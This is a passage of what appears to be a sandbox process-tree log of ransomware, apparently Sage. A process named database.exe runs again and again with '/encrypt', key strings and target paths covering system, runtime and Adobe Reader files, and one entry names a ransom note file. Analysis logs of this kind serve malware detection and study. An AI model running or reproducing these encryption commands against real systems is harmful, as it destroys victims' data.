                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\pagefile.sys"
                                                                                                          5⤵
                                                                                                            PID:2548
                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt.sage"
                                                                                                            5⤵
                                                                                                              PID:4428
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x86.log.html.sage"
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2440
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.sage"
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2756
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.sage"
                                                                                                              5⤵
                                                                                                                PID:4424
                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log.sage"
                                                                                                                5⤵
                                                                                                                  PID:5992
                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.sage"
                                                                                                                  5⤵
                                                                                                                    PID:6064
                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log.sage"
                                                                                                                    5⤵
                                                                                                                      PID:1564
                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log.sage"
                                                                                                                      5⤵
                                                                                                                        PID:1848
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.sage"
                                                                                                                        5⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:4476
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_001_vcRuntimeMinimum_x86.log.sage"
                                                                                                                        5⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2824
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_002_vcRuntimeAdditional_x86.log.sage"
                                                                                                                        5⤵
                                                                                                                          PID:4460
                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll"
                                                                                                                          5⤵
                                                                                                                            PID:2608
                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll"
                                                                                                                            5⤵
                                                                                                                              PID:4704
                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll"
                                                                                                                              5⤵
                                                                                                                                PID:6036
                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll"
                                                                                                                                5⤵
                                                                                                                                  PID:3760
                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll"
                                                                                                                                  5⤵
                                                                                                                                    PID:3804
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#Decrypt_Files_ReadMe#.rtf"
                                                                                                                                    5⤵
                                                                                                                                      PID:1428
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:1136
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll"
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1556
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Acrofx32.dll"
                                                                                                                                        5⤵
                                                                                                                                          PID:6068
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:4660
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRdIF.dll"
                                                                                                                                            5⤵
                                                                                                                                              PID:268
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
